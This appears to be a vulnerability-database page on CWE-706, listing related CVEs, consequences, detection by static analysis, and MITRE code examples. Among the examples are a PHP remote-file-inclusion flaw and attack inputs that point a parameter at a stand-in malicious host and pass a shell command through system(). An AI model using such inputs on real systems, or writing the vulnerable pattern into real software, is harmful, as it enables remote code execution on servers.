CWE-706: Use of Incorrectly-Resolved Name or Reference
The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.
Last updated
Overview
CWE-706 (Use of Incorrectly-Resolved Name or Reference) is a class-level software weakness catalogued by MITRE in the Common Weakness Enumeration (CWE). It describes a recurring type of mistake that can lead to exploitable security vulnerabilities.
Real-world CVEs
57 recorded CVEs are caused by CWE-706 (Use of Incorrectly-Resolved Name or Reference), including 2 in CISA's KEV (Known Exploited Vulnerabilities) catalog. KEVs are shown first. 23 new CWE-706 CVEs have been recorded so far in 2026 (6 in 2025).
- CVE-2021-40539CISA KEVCritical · CVSS 9.3 · EPSS 100th2021-09-07
- CVE-2020-15505CISA KEVCritical · CVSS 9.3 · EPSS 100th2020-07-07
- CVE-2024-35198Critical · CVSS 9.8 · EPSS 52th2024-07-18
- CVE-2023-31814Critical · CVSS 9.8 · EPSS 55th2023-05-23
- CVE-2022-30257Critical · CVSS 9.8 · EPSS 48th2022-11-21
- CVE-2022-30258Critical · CVSS 9.8 · EPSS 48th2022-11-21
- CVE-2026-35039
fast-jwt Affected by Cache Confusion via cacheKeyBuilder Collisions Can Return Claims From a Different Token (Identity/Authorization Mixup)
Critical · CVSS 9.1 · EPSS 12th2026-04-06 - CVE-2021-37315Critical · CVSS 9.1 · EPSS 62th2023-02-03
- CVE-2023-28643High · CVSS 8.8 · EPSS 52th2023-03-30
- CVE-2021-37214High · CVSS 8.8 · EPSS 61th2021-08-09
- CVE-2026-62190
OpenClaw < 2026.6.9 Authorization Bypass via flock wrapper
High · CVSS 8.7 · EPSS 20th2026-07-13 - CVE-2024-27295High · CVSS 8.2 · EPSS 49th2024-03-01
Showing 12 of 57 recorded CWE-706 CVEs. Track new ones as they are published and get AI-written analysis and fixes.
Monitor CWE-706 vulnerabilitiesCommon consequences
What can happen when CWE-706 is exploited.
Read Application Data, Modify Application Data
Affects: Confidentiality, Integrity
How it happens
When it is introduced
Typically introduced during these phases of the software lifecycle.
How to detect it
Automated Static Analysis
Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)
Code examples
Illustrative examples from MITRE showing how the weakness appears in code.
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
Vulnerable example
$dir = $_GET['module_name'];Attack input
victim.php?module_name=http://malicious.example.comVulnerable example
system($_GET['cmd']);Attack input
victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-lAttack input
/bin/ls -lThis script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an error is printed to the user.
Vulnerable example
import osSafe example
import osAttack patterns
CAPEC attack patterns that exploit this weakness.
Frequently asked questions
Common questions about CWE-706.
- What is CWE-706?
- The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.
- What CVEs are caused by CWE-706?
- 57 recorded CVEs are attributed to CWE-706, including CVE-2021-40539, CVE-2020-15505, CVE-2024-35198. 2 are listed in CISA's Known Exploited Vulnerabilities (KEV) catalog.
- How is CWE-706 detected?
- Automated Static Analysis: Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.)
- What are the consequences of CWE-706?
- Exploiting CWE-706 can lead to: Read Application Data, Modify Application Data.
- Is CWE-706 actively exploited?
- Yes. 2 CWE-706 vulnerabilities are in CISA's KEV catalog of actively exploited flaws, out of 57 recorded CVEs.
References
- MITRE CWE definition (CWE-706) (opens in a new tab)
- CWE-706 vulnerabilities on NVD (opens in a new tab)
- Learn: What is a CWE?
Weakness data is sourced from the MITRE CWE catalog (v4.20). CVE associations are aggregated and kept current by RadicalNotion.AI.
Stay ahead of CWE-706
Get alerted the moment a new CWE-706 vulnerability affects your stack, with AI-written analysis, severity context, and remediation guidance.